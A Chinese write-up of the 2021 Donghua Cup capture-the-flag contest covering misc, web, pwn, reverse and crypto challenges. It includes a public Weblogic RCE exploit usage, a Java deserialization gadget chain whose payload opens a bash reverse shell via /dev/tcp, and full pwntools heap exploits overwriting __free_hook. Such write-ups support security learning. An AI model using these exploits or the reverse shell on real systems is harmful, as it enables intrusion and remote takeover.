2021年全国大学生网络安全邀请赛暨第七届“东华杯“上海市大学生网络安全大赛Writeup

2021年全国大学生网络安全邀请赛暨第七届"东华杯"上海市大学网格全大赛Writeup

Misc

checkin

题目给了+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0- 是UTF-7编码,解码得到flag

1635663455205.png

flag为:

flag{dhb_7th}

project

下载附件,解压之后发现这是道工控题目,但是解压之后里面有一个压缩包problem_bak.zip

1635663588027.png

解压得到你来了~

1635663628463.png

1635663662815.png

这里面一共有三段数据,第一段是base64编码

6KGo5oOF5YyF5paH5YyW77yM5piv6ZqP552A572R57uc56S+5Lqk5rKf6YCa55qE5aKe5aSa5Ye6
546w55qE5LiA56eN5Li75rWB5paH5YyW44CC5LiA5Liq5Lq655qE6KGo5oOF5YyF5piv5YW26ZqQ
6JeP6LW35p2l55qE55yf5oiR77yM5LiA5Liq5Zu95a6255qE6KGo5oOF5YyF6YeM6IO955yL5Yiw
6L+Z5Liq5Zu95a6255qE6KGo5oOF44CC4oCM4oCM4oCM4oCM4oCN4oCs4oCs4oCM5pyJ5pe25YCZ
77yM6KGo5oOF5YyF6KGo6L6+55qE5piv5LiN6IO96YGT56C055qE55yf5a6e5oOz5rOV5ZKM5oSf
5Y+X77yM6K+t6KiA5ZKM5paH5a2X55qE5bC95aS077yM5bCx5piv6KGo5oOF5YyF5pa95bGV55qE
56m66Ze044CCDQrooajmg4XljIXmmK/nvZHnu5zor63oqIDnmoTkuIDnp43ov5vljJbvvIzlroPn
moTkuqfnlJ/lkozmtYHooYzkuI7lhbbnibnlrprnmoTigJzigIzigIzigIzigIzigI3vu7/igI3i
gI3nlJ/lrZjnjq/looPigJ3mnInlhbPjgILlhbbov73msYLphpLnm67jgIHmlrDlpYfjgIHosJDo
sJHnrYnmlYjmnpznmoTnibnngrnvvIzigIzigIzigIzigIzigI3vu7/igIzigKzkuI7lubTovbvk
urrlvKDmiazkuKrmgKflkozmkJ7mgKrnmoTlv4PnkIbnm7jnrKbigIzigIzigIzigIzigI3vu7/i
gIzigKzjgIINCuihqOaDheWMheS5i+aJgOS7peiDveWkn+Wkp+iMg+WbtOWcsOS8oOaSre+8jOKA
jOKAjOKAjOKAjOKAje+7v+KArOKAjeaYr+WboOS4uuWFtuW8peihpeS6huaWh+Wtl+S6pOa1geea
hOaer+eHpeWSjOaAgeW6puihqOi+vuS4jeWHhuehrueahOW8seeCue+8jOacieaViOWcsOaPkOmr
mOS6huayn+mAmuaViOeOh+OAgumDqOWIhuihqOaDheWMheWFt+acieabv+S7o+aWh+Wtl+eahOWK
n+iDve+8jOKAjOKAjOKAjOKAjOKAje+7v+KAjeKAjei/mOWPr+S7peiKguecgeaJk+Wtl+aXtumX
tOKAjOKAjOKAjOKAjOKAje+7v+KAjOKAjOOAgumaj+edgOaZuuiDveaJi+acuueahOWFqOmdouaZ
ruWPiuWSjOekvuS6pOW6lOeUqOi9r+S7tueahOWkp+mHj+S9v+eUqO+8jOihqOaDheWMheW3sue7
j+mrmOmikeeOh+WcsOWHuueOsOWcqOS6uuS7rOeahOe9kee7nOiBiuWkqeWvueivneW9k+S4reOA
gg0K

解码得到:

表情包文化,是随着网络社交沟通的增多出现的一种主流文化。一个人的表情包是其隐藏起来的真我,一个国家的表情包里能看到这个国家的表情。‌‌‌‌‍‬‬‌有时候,表情包表达的是不能道破的真实想法和感受,语言和文字的尽头,就是表情包施展的空间。
表情包是网络语言的一种进化,它的产生和流行与其特定的“‌‌‌‌‍‍‍生存环境”有关。其追求醒目、新奇、谐谑等效果的特点,‌‌‌‌‍‌‬与年轻人张扬个性和搞怪的心理相符‌‌‌‌‍‌‬。
表情包之所以能够大范围地传播,‌‌‌‌‍‬‍是因为其弥补了文字交流的枯燥和态度表达不准确的弱点,有效地提高了沟通效率。部分表情包具有替代文字的功能,‌‌‌‌‍‍‍还可以节省打字时间‌‌‌‌‍‌‌。随着智能手机的全面普及和社交应用软件的大量使用,表情包已经高频率地出现在人们的网络聊天对话当中。

通过这解码得到的结果可以明显的观察到有隐藏字符

1635677058506.png

通过解0宽字符得到hurryup,很明显这应该是某个地方的密钥,但现在暂时还未遇到,继续往下看

在线解0宽字符的网址:https://330k.github.io/misc_tools/unicode_steganography.html

1635665832884.png

第二部分说了是quoted-printable加密,编码方式是,在线解密得到

1635666046005.png

其中的文字是跟第一段base64的文字相吻合的。

第三段说了是jpg图片,并且是base64加密的数据

1635666134319.png

这段base64数据是没有添加数据头的,自行补上data:image/jpg;base64,,然后转为图片得到这张图

1635666259343.png

用010打开,发现图片结尾FF D9之后是有多余的数据的

1635666346736.png

最终发现是OurSecret隐写,因为用这个软件打开,如果图片不是OurSecret隐写,那么将不会显示数据大小的

1635666461413.png

这里显示了数据的大小,也就证实了是OurSecret隐写,密钥就是第一段0宽解密出来得到的hurryup

1635666548934.png

1635666561713.png

所以flag为:

flag{f3a5dc36-ad43-d4fa-e75f-ef79e2e28ef3}

JumpJumpTiger

jump.exe打开ida,查看到hint

int  main(int argc, const char **argv, const char **envp)
{
	int v4[100]; // [rsp+20h] [rbp-60h]
	int v5[101]; // [rsp+1B0h] [rbp+130h]
	int v6; // [rsp+344h] [rbp+2C4h]
	int v7; // [rsp+348h] [rbp+2C8h]
	int i; // [rsp+34Ch] [rbp+2CCh]

	printf("This is your hint!!!");
	v7 = 0;
	v6 = 0;
	for (i = 0; i <= 99; ++i)
	{
		if (i & 1)
			v4[v6++] = i;
		else
			v5[v7++] = i;
	}
	return 0;
}

大致意思,奇偶分离。

查看jump.exe内码,发现大量疑似base64编码,直接提取

/i9VjB/O4RAwA0QKSGkgZoJARAgAAABNASQUEhAEAUQgAABAABA4DA/A2AwABQD4ACAAUIDABAAAQBEnAswVUYEUBAAAQAFgBAQEUlGEBQwVwRI4BAwWcTHBBQwZ8YLsC5w5kaMcE1Q88/SsEuhCEcPAEURvEOTfFFhdwUXiERx8QBaaFaRqEtRBGsCtE7YNG+hI08dZHIxx8xfIE6xtcbiSJ3CvIrevJ/B/wWe/H9xA7f/Q2NwkBnDbAJQJUJFsBXQ9ccG1BMw74aIBCtAr4veLFQBxEKU/HShZ4ee3HChm4xefHYhk4CeAH/hN42eqHrhT...共八百万字符

直接尝试奇偶分离

file = open("in.txt")
file2 = open("out.txt","r+")
for line in file:
    tmp = line
    print(tmp)
    s = ''
    for i in range(len(tmp)):
        if i & 2 == 1:
        #if i % 2 == 1:
            s += tmp[i]
    file2.write(s)
    print(len(s))

刚好拿到两串base64编码均以=号结尾

/9j/4AAQSkZJRgABAQEAAQABAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAQ4B4ADAREAAhEBAxEB/8QAHQAAAgIDAQEBAAAAAAAAAAAAAQIAAwQFBgcICf/EAEUQAQABAwMDAwMDAwMDAwECDwECAAMRBBIhBTFBBiJR...共四百万字符

分别解码,得到了一张jpg和一张png,两张图片看起来是一样的,很明显就是盲水印了,直接使用命令:

python bwmforpy3.py decode 2.jpg 2.png flag.png

1635678672181.png

得到flag.png,打开即能看到flag

1635678709311.png

flag为:

flag{72f73bbe-9193-e59a-c593-1b1cb8f76714}

Web

apacheprOxy

打开附件,发现这是Weblogic

1635692411817.png

Weblogic有一个cve-2020-14882远程命令执行漏洞,GitHub上有现成的exp

EXP地址:https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py

因为开了反代,直接访问就进了i春秋官网了,抓个包获取一下真实的题目环境地址

1635672298386.png

使用命令:

python 1.py -u "http://47.104.100.25:7410/" -c "ls /"

1635667546539.png

然后直接cat /flag:

python 1.py -u "http://47.104.100.25:7410/" -c "cat /flag"

1635667630737.png

所以flag为:

flag{da77ef49-5958-40d5-b426-664b8299e576}

EzGadget

开始审计,IndexController.java

.....
ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
        String name = objectInputStream.readUTF();
        int year = objectInputStream.readInt();
        if (name.equals("gadgets") && year == 2021) {
            objectInputStream.readObject();
        }
.....

绕过这里再输出流再

oos.writeUTF("gadgets");
oos.writeInt(2021);

就好了

ToStringBean.java

public String toString() {
        ToStringBean toStringBean = new ToStringBean();
        Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
        Object var3 = null;

        try {
            var3 = clazz.newInstance();
        } catch (InstantiationException var5) {
            var5.printStackTrace();
        } catch (IllegalAccessException var6) {
            var6.printStackTrace();
        }

        return "enjoy it.";
    }

可以看到加载了字节码,这里加载字节码的函数是toString,cc5链的BadAttributeValueExpException的readobject方法正好调用了toString,该类是jdk自带的,并且参数可控

1635690479241.png

import com.ezgame.ctf.tools.ToStringBean;
import ezgame.ctf.bean.User;


import javax.management.BadAttributeValueExpException;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Field;

public class exp {
    public static void main(String[] args) throws Exception {
        InputStream inputStream = evil.class.getResourceAsStream("evil.class");
        byte[] bytes = new byte[inputStream.available()];
        inputStream.read(bytes);

        ToStringBean sie =new ToStringBean();
        Field bytecodes = Reflections.getField(sie.getClass(),"ClassByte");
        Reflections.setAccessible(bytecodes);
        Reflections.setFieldValue(sie,"ClassByte",bytes);

        BadAttributeValueExpException exception = new BadAttributeValueExpException("exp");
        Reflections.setFieldValue(exception,"val",sie);
				String a=Serialize.serialize(exception);
        System.out.print(a);

    }
}

加载的字节码类

class exp{

static {
try {
	Runtime.getRuntime().exec("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
	}
	catch(){
	}
}

}

这里进一下if

writeUTF("gadgets");
writeInt(2021);

生成的payload可以直接打,之后vps监听收到反弹的shell

1635692065245.png

Pwn

cpp1

2.31 漏洞点在edit里 ,可以造成溢出
用0x80的chunk填满tcache后 溢出打size
造成堆快重叠,并且释放重叠的堆块进unsortedbin
然后show出libc 后面就正常的tcache attack 溢出打freehook为system getshell

Exp如下:

from pwn import*

context.log_level = "debug"

#io = process("./pwn")
io = remote("47.104.143.202","43359")

def menu(choice):
	io.sendlineafter(">>",str(choice))

def add(index,size):
	menu(1)
	io.sendlineafter(">>",str(index))
	io.sendlineafter(">>",str(size))

def edit(index,content):
	menu(2)
	io.sendlineafter(">>",str(index))
	io.sendlineafter(">>",content)

def show(index):
	menu(3)
	io.sendlineafter(">>",str(index))

def delete(index):
	menu(4)
	io.sendlineafter(">>",str(index))

def look():
	global io
	gdb.attach(io)

for i in range(0,7):
	add(i,0x80)

add(7,0x18)
add(8,0x50)
add(9,0x20)
add(10,0x30)

edit(7,b"a"*0x10 + p64(0) + b"\x91")

for i in range(0,7):
	delete(i)

delete(8)

for i in range(0,7):
	add(i,0x80)

add(8,0x50)
show(9)

info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
malloc_hook = info - 96 - 0x10
libc = ELF("./libc-2.31.so")
libc_base = malloc_hook - libc.sym["__malloc_hook"]
free_hook = libc_base + libc.sym["__free_hook"]
success("free_hook:"+hex(free_hook))
system = libc_base + libc.sym["system"]

add(11,0x20)

add(12,0x18)
add(13,0x18)
add(14,0x18)

delete(12)
delete(14)
edit(13,p64(0)*3 + p64(0x21) + p64(free_hook))

add(14,0x18)
add(15,0x18)

edit(15,p64(system))
edit(14,"/bin/sh\x00")

delete(14)

io.interactive()

1635684581516.png

flag为:

flag{96f7801e4e658271915cf5ab3aa26ee6}

bg3

泄露libc:因为可以申请大chunk,于是
释放一个>0x420chunk 进unsortedbin 然后申请回来 直接show得到libc
get shell : 漏洞点在add里面 相同index的size可以叠加
于是通过溢出打free_hook为system get shell

Exp如下:

from pwn import*

context.log_level = "debug"

io = remote("47.104.143.202","25997")
#io = process("./pwn")

def menu(choice):
	io.sendlineafter("Select:",str(choice))

def add(index,size): 
	menu(1)
	io.sendlineafter("Index:",str(index))
	io.sendlineafter(":",str(size))

def edit(index,content):
	menu(2)
	io.sendlineafter("Index:",str(index))
	io.sendlineafter("BugInfo:",content)

def show(index):
	menu(3)
	io.sendlineafter("Index:",str(index))

def delete(index):
	menu(4)
	io.sendlineafter("Index:",str(index))

def look():
	global io
	gdb.attach(io)

add(0,0x420)
add(1,0x18)
delete(0)
add(0,0x420)
show(0)
info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
print(hex(info))
libc = ELF("./libc-2.31.so",checksec = 0)
malloc_hook = info - 96 - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"]
system = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]

add(2,0x18) #fuck!
delete(2)
add(2,0x18)
delete(2)
add(2,0x18)
delete(2)
add(2,0x18)

add(3,0x18)
add(4,0x18)
delete(4)
delete(3)
edit(2,p64(0)*4 + p64(free_hook))
add(5,0x18)
add(6,0x18)
edit(6,p64(system))
edit(5,b"/bin/sh\x00")
delete(5)

io.interactive()

1635680900182.png

flag为:

flag{7240aca686aa4bc4d7697b2d7b5c7655}

gcc2

漏洞点在Remove里,有uaf。
leak_libc : 通过uaf首先泄露堆地址
然后改tcache的fd指针指向原本地址+0x10处
再申请回来时,可以造成堆快向下的0x10溢出,溢出改size为0xe1
然后对0xe1的chunk进行edit绕过double free check
把该chunk释放7次进tcache中
再释放一次 进入unsortedbin show得到libc
最后利用uaf直接tcache attack打free_hook为system get shell.

from pwn import*

context.log_level = "debug"

#io = process("./pwn")
io = remote("47.104.143.202","15348")

def menu(choice):
	io.sendlineafter(">>",str(choice))

def add(index,size):
	menu(1)
	io.sendlineafter(">>",str(index))
	io.sendlineafter(">>",str(size))

def edit(index,content):
	menu(2)
	io.sendlineafter(">>",str(index))
	io.sendlineafter(">>",content)

def show(index):
	menu(3)
	io.sendlineafter(">>",str(index))

def delete(index):
	menu(4)
	io.sendlineafter(">>",str(index))

def look():
	global io
	gdb.attach(io)

add(0,0x60)
add(1,0x60)
add(2,0x60)
add(3,0x60)
add(4,0x18)

delete(1)
edit(1,p64(0)+p64(0x71))
delete(0)
show(0)
io.recvuntil("\n")
chunk_addr = u64(io.recv(6).ljust(8,b'\x00'))
print(hex(chunk_addr))
fake_addr = chunk_addr + 0x10
print(hex(fake_addr))
edit(0,p64(fake_addr))

add(5,0x60)
add(6,0x60)
edit(6,b"a"*0x58 + b"\xe1")

for i in range(0,7):
	edit(2,p64(0)*2)
	delete(2)

edit(2,p64(0)*2)
delete(2)
show(2)
info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
print(hex(info))

libc = ELF("./libc-2.31.so",checksec = 0)
malloc_hook = info - 96 - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"] 
free_hook = libc_base + libc.sym["__free_hook"]
system =  libc_base + libc.sym["system"]

add(9,0x18)
add(10,0x18)
delete(9)
delete(10)
edit(10,p64(free_hook))
add(11,0x18)
add(12,0x18)

edit(12,p64(system))
add(13,0x18)
edit(13,b"/bin/sh\x00")
delete(13)
io.interactive()

1635687376604.png

flag为:

flag{c9749ef8cbfdc4fc56542daea489a71c}

boom_script

这题是c解释器有关的题,正好前一段时间有师傅给我发了类似的题,这题是uaf的漏洞,通过字符串的变换可以进行堆块的申请与释放,来进行泄露和getshell

Exp:

from pwn import*

context.log_level = "debug"

#io = process("./boom_script")
io = remote("47.104.143.202","41299")

def look():
	global io
	gdb.attach(io)

def shell(payload):

	io.recvuntil("$")
	io.sendline(str(1))
	io.recvuntil('length:')
	io.sendline(str(len(payload)))
	io.recvuntil('code:')
	io.send(payload)


def main():
	#the code to leak main_arena + offset and to fuck the libc
	payload="""
    a="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
	b=a;
	a="bbbbbb";
	c=0;
	prints(b);
	array arr[20];
	arr[0]=1193046;
	arr[1]=1193046;
	b="asdasd";
	a1="cccccccc";
	a2="cccccccc";
	a3="cccccccc";
	a3="cccccccc";
	a4="cccccccc";
	a5="cccccccc";
	a9="cccccccc";
	tc="sssssssssssssssssssssssssssssssssssssssssssssssss";
	a6="sssssssssssssssssssssssssssssssssssssssssssssssss";
	a7="/bin/sh";
	a8="/bin/sh";
	a6="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss";
	tc="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss";
	prints("dddddd");
	inputn(c);
	arr[0]=c;
	arr[1]=c;
	tc1="sssssssssssssssssssssssssssssssssssssssssssssssss";
	array arr1[1];
	prints("dddddd");
	inputn(c);
	arr1[0]=c;
	a7="aaa";
	inputn(c);
    """

	shell(payload)
	libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-0x1ebbe0
	libc=ELF('./libc.so.6',checksec = 0)
	success("libc_base"+hex(libc_base))

	free_hook=libc_base+libc.sym['__free_hook']
	system=libc_base+libc.sym['system']
	success("free_hook:"+hex(free_hook))
	success("system:"+hex(system))

	#fuck the free_hook to the system
	io.sendlineafter("dddddd\n",str(free_hook-0x28))
	io.sendlineafter("dddddd\n",str(system))

	io.interactive()

if __name__ == '__main__':
	main()

1635690516069.png

flag为:

flag{35f2d3a9-bddc-9ffe-e8f7-ab999010b196}

Reverse

ooo

送分题,就是做慢了,呜呜呜

1635681287859.png

1635681329257.png

1635681357794.png

照着搞就行了,一如既往,偷懒,暴力跑

1635681395786.png

1635681423884.png

flag为:

flag{13f35663-50a4-477b-278b-b711026ff7ad}

mod

这道题关键是花指令的去除,偷偷懒,只去除算法段,丢IDA F5

1635682158947.png

1635682223058.png

好了,base魔改,懒得分析算法,直接暴力跑

1635682251275.png

flag:

flag{5a073724-8223-413d-11fa-d53b133df89e}

Hell’s Gate

刚开始拿到这题,看到了很多个0x100感觉是RC4,就很激动(秒了,秒了),根据习惯,我还是先爆破,再来分析算法,单步到如下图的时候,发现这里一直指针异常,说明有异常处理之类的东西,然后果然。。。。

1635682847311.png

1635682888975.png

跟到00416F90函数,上面有部分貌似是反调试(反正没检测到我OD,估计是检测windbg之类的),能处理就处理吧,不过多阐述。找到算法段,发现了些奇奇怪怪的东西,类似于下图还有很多种这个代码。

1635682913571.png

Retf顾名思义,能给cs寄存器赋值,而cs寄存器为23的时候代表是32位汇编模式,33的时候则是64汇编模式,所以下面的汇编代码是64位的,windbg貌似也不能调试起来(也懒得找原因,好像是异常)因为每个64位汇编call代码量普遍不多,我就用CE去看汇编代码,逐个分析功能,如下图,就是个指针赋值call,经过一段时间分析,发现是tea算法

1635682948489.png

1635682965929.png

脚本如下:

1635683012029.png

flag为:

flag{0f4d0db3-668d-d58c-abb9-eb409657eaa8}

hello

调用JNI

1635689380676.png

String2 可以用log找到

1635689442372.png

1635689463170.png

So代码

1635689500277.png

脚本如下:

raw_sign = '308202e4308201cc020101300d06092a864886f70d010105050030373116301406035504030c0d416e64726f69642044656275673110300e060355040a0c07416e64726f6964310b30090603550406130255533020170d3231303330363134333034385a180f32303531303232373134333034385a30373116301406035504030c0d416e64726f69642044656275673110300e060355040a0c07416e64726f6964310b300906035504061302555330820122300d06092a864886f70d01010105000382010f003082010a0282010100cbf2b09e4308ebb459e8841e5a7b920497fef2b349e80648f7eb35f48d40a75e7ce7945b8b42d197bec0bf177e6c9899ed707dcc4a726cb14c1a69b0c4a02474806fa73cfb10e10f7b1665021c24762b6edad65ca63cea3c72e0d4e4ca3f98301173eec3254337af1f5a11f779ecbe04d1b74d53f5835e011222155a56f97e00d75374cd93080dfa087cd356a99fe1eebf5d6d5e31846aad5252c3a17a4656e2e210ce1c7aa4d147fb8cf440a50add61bbb2ec299a2e0dab0b4504796ac3a899da553ab1d83576691ab23409d18398014b3b5eaf12e83f4d99aa09e1e4e4cae133530730c1133da2b3dee37b58eb1a5795b221ec5a8830731a41167d295f9e1b0203010001300d06092a864886f70d010105050003820101000e4740235e9cf2be33de3e06d777139cbbc5cf0622285c17da04697b8067318aaf8df0fbb4d3166f293ea15aa2592f06eb6929af063722ac9f30ad85e2c087564931d6ac65fcd5fbc864b3dc9841e039c6e1d5fbc5c2f8adf90a547bc4ebc07d387914db24451c2cc89925359bd3bb0750c7aabf9d743b1893e98bbc8ff74b24fc0b4be2dbaaf1c917bba01496d0617ffc3a4a8b7a6e79a3036298a6ebf57bb00001e43a0b242864eebb0fcec9e323144d4447c878430f18e6e358ad97566fa04d1f07b171c1476c9af5a1eba0bf6616e219c0b9e1299d09fecded24a880397f92e0f99d8951228c7770c184fd77adff943bfc8b6aa524c5f0a6d7686fe35486'
enc = [0xCA, 0xEB, 0x4A, 0x8A, 0x68, 0xE1, 0xA1, 0xEB, 0xE1, 0xEE,
	   0x6B, 0x84, 0xA2, 0x6D, 0x49, 0xC8, 0x8E, 0x0E, 0xCC, 0xE9,
	   0x45, 0xCF, 0x23, 0xCC, 0xC5, 0x4C, 0x0C, 0x85, 0xCF, 0xA9,
	   0x8C, 0xF6, 0xE6, 0xD6, 0x26, 0x6D, 0xAC, 0x0C, 0xAC, 0x77,
	   0xE0, 0x64]

for i in range(0, 42):
	enc[i] = (enc[i] << 3 & 0xff) + (enc[i] >> 5 & 0xff)
flag = ""
for i in range(len(enc)):
	index = i * 27 + 327
	magic = ord(raw_sign[index]) + i
	flag += chr(magic ^ enc[i])
print flag

1635689916263.png

flag为:

flag{d5577edd-8211-7a0e-f23a-305b0b10683f}

Crypto

BlockEncrypt

反编译,得到不完整的加密函数,可以发现是aes,然后解密

脚本如下:

from pwn import *
import hashlib
import string


s="flag{abcdef0123456789-}"

def f(a,b):
	m=[]
	for i in range(10):
		m.append(str(i))
	for i in range(26):
		m.append(chr(i+0x41))
		m.append(chr(i+0x61))
	for i in m:
		for j in m:
			for k in m:
				for p in m:
					t=i+j+k+p+a
					if(hashlib.sha256(t.encode()).hexdigest()==b):
						print("find")
						return t[:4]


sh=remote("47.104.183.8","47971")
sh.recvuntil(b"X+")
a=(sh.recvuntil(b")",drop=True).decode())

sh.recvuntil(b"== ")
b=(sh.recvuntil(b"\n",drop=True).decode())
sh.send(f(a,b).encode())
sh.recv()
print(sh.recv().decode())

sh.send(b'1')
sh.recv()
sh.recvuntil(b"\n",drop=True)
flag=(sh.recvuntil(b"\n[+]",drop=True))
print()

t=0
r=""
while 1:
	for i in s:
		m=r+i
		m=m.encode()
		sh.send(b'2')
		sh.send(m)
		sh.recv()
		sh.recv()
		sh.recvuntil(b"CipherText:",drop=True)
		c=(sh.recvuntil(b"\n[+]",drop=True))
		if(c[t]==flag[t]):
			r=r+i
			t+=1
			print(r)

1635690908280.png

flag为:

flag{ad7e9276-de18-52b8-8c1c-3db559274f2d}
来源url
栏目